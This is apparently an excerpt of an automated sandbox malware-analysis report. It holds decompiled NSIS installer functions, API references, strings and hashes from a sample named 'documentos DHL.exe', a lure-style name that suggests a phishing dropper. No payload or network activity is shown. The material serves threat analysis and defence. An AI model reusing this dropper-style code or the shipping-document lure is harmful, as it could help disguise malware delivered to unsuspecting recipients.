				_t105 = E00405EA2(L"C:\\Users\\Arthur\\Desktop\\documentos DHL.exe", 0x80000000, 3);
				 *0x40a018 = _t105;
				if(_t105 == 0xffffffff) {
					return L"Error launching installer";
				}
				E004063B0(L"C:\\Users\\Arthur\\Desktop", L"C:\\Users\\Arthur\\Desktop\\documentos DHL.exe");
				E004063B0(0x439000, E00405CCD(L"C:\\Users\\Arthur\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x418ee0 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E72(1);
					__eflags =  *0x42a258;
					if( *0x42a258 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E004068EB(0x40ce48);
						E00405ED1(0x40ce48,  &_v560, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403441( *0x42a258 + 0x1c);
							 *0x418ee4 = _t65;
							 *0x418ed8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004031BA(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a254 = _t110;
								 *0x42a25c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a260 =  *0x42a260 + 1;
									__eflags =  *0x42a260;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x418ed4; // 0x6d5e
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405E5D(0x42a280, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403441( *0x418ed0);
					_t77 = E0040342B( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a258) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E0040342B(0x418ee8, _t106);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E72(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a258;
						if( *0x42a258 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E72(0);
							}
							goto L19;
						}
						E00405E5D( &_v40, 0x418ee8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x418ed0; // 0x0
						 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x42a258 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x418ee0; // 0x3fbc
						if(__eflags < 0) {
							_v8 = E0040687D(_v8, 0x418ee8, _t106);
						}
						 *0x418ed0 =  *0x418ed0 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402f22
0x00402f25
0x00402f3f
0x00402f44
0x00402f57
0x00402f5c
0x00402f62
0x00000000
0x00402f64
0x00402f75
0x00402f86
0x00402f8d
0x00402f93
0x00402f95
0x00402f9a
0x00402f9c
0x0040308c
0x0040308e
0x00403093
0x0040309a
0x00000000
0x00000000
0x004030a0
0x004030a3
0x004030cf
0x004030d4
0x004030df
0x004030e1
0x004030f2
0x0040310d
0x00403113
0x00403116
0x0040311b
0x0040313a
0x0040314a
0x0040315c
0x00403161
0x00403166
0x00403169
0x00403172
0x00403176
0x0040317e
0x00403183
0x00403185
0x00403185
0x00403185
0x0040318d
0x0040318d
0x00403190
0x00403191
0x00403191
0x00403194
0x00403196
0x00403196
0x00403196
0x00403199
0x004031a0
0x004031ac
0x004031b1
0x00000000
0x004031b1
0x00000000
0x00403169
0x00000000
0x0040311d
0x004030ab
0x004030b6
0x004030bb
0x004030bd
0x00000000
0x00000000
0x004030c6
0x004030c9
0x00000000
0x00000000
0x00000000
0x00402fa2
0x00402fa2
0x00402fa7
0x00402fab
0x00402fb2
0x00402fb7
0x00402fb9
0x00402fbb
0x00402fbb
0x00402fc3
0x00402fc8
0x00402fca
0x00403129
0x0040316b
0x00000000
0x0040316b
0x00402fd0
0x00402fd6
0x00403056
0x0040305a
0x0040305d
0x00403062
0x00000000
0x0040305a
0x00402fe3
0x00402fe8
0x00402feb
0x00402ff0
0x00000000
0x00000000
0x00402ff2
0x00402ff9
0x00000000
0x00000000
0x00402ffb
0x00403002
0x00000000
0x00000000
0x00403004
0x0040300b
0x00000000
0x00000000
0x0040300d
0x00403014
0x00000000
0x00000000
0x00403016
0x0040301c
0x00403025
0x0040302b
0x0040302e
0x00403030
0x00403036
0x00000000
0x00000000
0x0040303c
0x00403040
0x00403048
0x00403048
0x0040304b
0x0040304e
0x00403050
0x00403052
0x00403052
0x00000000
0x00403050
0x00403042
0x00403046
0x00000000
0x00000000
0x00000000
0x00403063
0x00403063
0x00403069
0x00403079
0x00403079
0x0040307c
0x00403082
0x00403084
0x00403084
0x00000000
0x00402fa2

APIs

GetTickCount.KERNEL32 ref: 00402F28
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\documentos DHL.exe,00000400), ref: 00402F44

Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\documentos DHL.exe,80000000,00000003), ref: 00405EA6
Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\documentos DHL.exe,C:\Users\user\Desktop\documentos DHL.exe,80000000,00000003), ref: 00402F8D
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4

Strings

C:\Users\user\Desktop, xrefs: 00402F6F, 00402F74, 00402F7A
Error launching installer, xrefs: 00402F64
Null, xrefs: 0040300D
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311D
Inst, xrefs: 00402FFB
"C:\Users\user\Desktop\documentos DHL.exe", xrefs: 00402F14
C:\Users\user\AppData\Local\Temp\, xrefs: 00402F21, 004030EC
C:\Users\user\Desktop\documentos DHL.exe, xrefs: 00402F2E, 00402F3D, 00402F51, 00402F6E
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040316B
soft, xrefs: 00403004

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\documentos DHL.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\documentos DHL.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-481420835
Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD

Uniqueness

Uniqueness Score: -1.00%

Function 004063D2 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E004063D2(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x42921c - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x42a298 + _t43 * 2;
				_t44 = 0x4281e0;
				_t110 = 0x4281e0;
				if(_a4 >= 0x4281e0 && _a4 - 0x4281e0 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E004063D2(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x4281e0;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = L"540027183" + (_t106 << 0xb);
							E004063B0(_t110, L"540027183" + (_t106 << 0xb));
						} else {
							E004062F7(_t110,  *0x42a248);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E00406644(_t110);
						}
						goto L43;
					}
					_t86 =  *0x42a24c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42a2e4;
						if( *0x42a2e4 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x42a244;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x42a248,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x42a248,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E0040627E( *0x42a298, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E004063D2(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E004063B0(_a4, _t44);
			}

0x004063d2
0x004063d2
0x004063d2
0x004063d8
0x004063dd
0x004063ee
0x004063ee
0x004063f6
0x004063f7
0x004063f8
0x004063f9
0x004063fc
0x00406404
0x00406406
0x0040641f
0x00406422
0x00406422
0x0040661e
0x0040661e
0x00406624
0x00000000
0x00000000
0x00406432
0x00406438
0x00000000
0x00000000
0x00406440
0x00406441
0x00406443
0x00406447
0x0040644a
0x0040660b
0x00406619
0x0040661c
0x0040661c
0x0040660d
0x00406610
0x00406613
0x00406615
0x00406615
0x00000000
0x0040660b
0x00406450
0x00406453
0x00406462
0x00406469
0x00406473
0x00406477
0x0040647a
0x0040647d
0x00406482
0x00406487
0x0040648b
0x0040648e
0x004065ae
0x004065b2
0x004065e5
0x004065e9
0x004065ee
0x004065f3
0x004065f3
0x004065f8
0x004065f9
0x004065fe
0x00406601
0x00406604
0x00000000
0x00406604
0x004065b4
0x004065b7
0x004065ba
0x004065cf
0x004065d6
0x004065bc
0x004065c3
0x004065c3
0x004065de
0x004065e1
0x004065a6
0x004065a7
0x004065a7
0x00000000
0x004065e1
0x00406494
0x0040649c
0x0040649e
0x0040649f
0x004064b8
0x004064b8
0x004064bf
0x004064bf
0x004064c6
0x004064ca
0x004064ca
0x004064cb
0x004064cd
0x00406508
0x0040650b
0x0040651b
0x0040651e
0x00406526
0x0040652c
0x0040652c
0x00406589
0x00406589
0x0040658b
0x00000000
0x00000000
0x00406530
0x00406537
0x00406538
0x0040653a
0x00406554
0x00406562
0x00406568
0x0040656a
0x00406585
0x00406585
0x00406585
0x00000000
0x00406585
0x00406570
0x0040657b
0x00406581
0x00406583
0x00000000
0x00000000
0x00000000
0x00406583
0x0040653c
0x0040653f
0x00000000
0x00000000
0x0040654e
0x00406550
0x00406552
0x00000000
0x00000000
0x00000000
0x00406552
0x00000000
0x00406589
0x00406513
0x00000000
0x004064cf
0x004064ed
0x004064f2
0x004064f6
0x00406596
0x00406596
0x00406599
0x004065a1
0x004065a1
0x00000000
0x00406599
0x004064fe
0x0040658d
0x0040658d
0x00406591
0x00000000
0x00000000
0x00406593
0x00000000
0x00406593
0x004064cd
0x004064a1
0x004064a6
0x00000000
0x00000000
0x004064a8
0x004064ab
0x00000000
0x00000000
0x004064ad
0x004064b0
0x00000000
0x004064b2
0x004064b2
0x00000000
0x004064b2
0x004064b0
0x0040662a
0x00406635
0x00406641
0x00406641
0x00000000

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406513
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406526
SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406562
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406570
CoTaskMemFree.OLE32(00000000), ref: 0040657B
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
lstrlenW.KERNEL32(Call,00000000,00422708,?,0040544B,00422708,00000000), ref: 004065F9

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040659B
Call, xrefs: 004063FC, 004064D7, 004064DE, 004064E2, 004064FC, 004064FD, 00406512, 00406525, 00406541, 0040656C, 004065A0, 004065A6, 004065C2, 004065D5, 004065F2, 004065F8, 00406604, 00406637
540027183, xrefs: 004065CF
Software\Microsoft\Windows\CurrentVersion, xrefs: 004064E3

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: 540027183$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1892903659
Opcode ID: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
Opcode Fuzzy Hash: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C37(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405CF8( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405C81(E004063B0(_t84, L"C:\\Users\\Arthur\\Zorillinae\\Skaalpundet\\Inkbslistes\\Tset\\Demodulationen\\Iagttagerposition")), ??);
				} else {
					E004063B0();
				}
				E00406644(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004066F3(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405E7D(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405EA2(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405414(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E004063B0("C:\Users\Arthur\AppData\Local\Temp\nsw5DC6.tmp", _t81);
						E004063B0(_t81, _t84);
						E004063D2(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsw5DC6.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E004063B0(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsw5DC6.tmp");
						_t64 = E00405A12("C:\Users\Arthur\AppData\Local\Temp\nsw5DC6.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E00405414();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405414(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E004031BA(_t79,  *((intOrPtr*)(_t86 - 0x20)),  *(_t86 - 0x30), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004063D2(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E004063D2(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E00405A12();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x00402885
0x00402885
0x00402abf
0x00402ac2
0x00402ac2
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402ac8
0x00402ac8
0x00402ac8
0x00401867
0x00401867
0x00401868
0x00401493
0x004022f1
0x004022f1
0x004022f1
0x00401865
0x0040185e
0x00402aca
0x00402ace
0x00402ace
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x004022ec
0x00000000
0x004022ec
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition,?,?,00000031), ref: 004017D5

Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD

Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

Strings

C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll, xrefs: 00401835, 00401851
Call, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp, xrefs: 00401821, 0040183F
C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition, xrefs: 0040179E

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
